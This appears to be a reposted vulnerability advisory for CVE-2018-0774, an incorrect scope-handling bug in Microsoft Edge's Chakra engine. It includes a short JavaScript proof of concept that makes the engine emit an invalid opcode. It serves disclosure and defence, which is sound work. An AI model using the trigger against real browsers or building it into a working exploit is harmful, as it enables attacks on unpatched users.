Microsoft Edge Chakra Incorrect Scope Handling

Microsoft Edge Chakra suffers from an incorrect scope handling vulnerability.


MD5 | f9aa042a0c635706708db62651d0068a

Microsoft Edge: Chakra: Incorrect scope handling 

CVE-2018-0774


PoC:
(function func(arg = function () {
print(func); // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function.
}()) {
print(func);
function func() {

}
})();

Chakra fails to distinguish whether the function is referenced in the param scope and ends up to emit an invalid opcode.


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt


Related Posts

Comments